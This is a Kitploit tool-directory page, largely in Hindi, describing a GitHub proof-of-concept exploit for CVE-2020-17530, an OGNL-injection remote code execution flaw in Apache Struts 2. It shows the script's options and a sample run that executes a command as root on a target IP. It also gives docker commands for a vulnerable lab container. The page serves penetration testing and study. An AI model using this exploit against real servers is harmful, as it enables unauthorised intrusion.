Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-17530 — CVE-2020-17530 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, OGNL इंजेक्शन के माध्यम से Apache Struts 2 में दूरस्थ कोड निष्पादन भेद्यता। कमजोर Struts इंस्टेंस को लक्षित करने के लिए Python स्क्रिप्ट शामिल है। | Kitploit
उपकरण/GitHubGitHub/cyborgsecurity/cve-2020-17530
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगArchived
GitHubcyborgsecurity/cve-2020-17530

CVE-2020-17530

CVE-2020-17530 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, OGNL इंजेक्शन के माध्यम से Apache Struts 2 में दूरस्थ कोड निष्पादन भेद्यता। कमजोर Struts इंस्टेंस को लक्षित करने के लिए Python स्क्रिप्ट शामिल है।

रिपॉजिटरी देखें
4325 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-17530

CVE-2020-17530 के लिए त्वरित POC। Apache Struts संस्करण 2.0.0 - 2.5.25 में, टैग विशेषताओं में कच्चे उपयोगकर्ता इनपुट पर जबरन Object Graph Navigational Language (OGNL) मूल्यांकन रिमोट कोड निष्पादन (RCE) का कारण बन सकता है।

root@kitploit:~
$ python CVE-2020-17530.py --help
usage: CVE-2020-17530.py [-h] [-c COMMAND] [-n NAME] [-p PORT] [-t TARGET] [-u URI]

optional arguments:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        command
  -n NAME, --name NAME  form data name
  -p PORT, --port PORT  port
  -t TARGET, --target TARGET
                        target
  -u URI, --uri URI     uri

$ python CVE-2020-17530.py --target 10.10.30.62 --port 8080 --uri "/index.action" --command id
uid=0(root) gid=0(root) groups=0(root)

सेटअप

root@kitploit:~
$ docker pull vulhub/struts2:2.5.25
$ docker run -d -p 8080:8080 vulhub/struts2:2.5.25
टूल डाउनलोड करें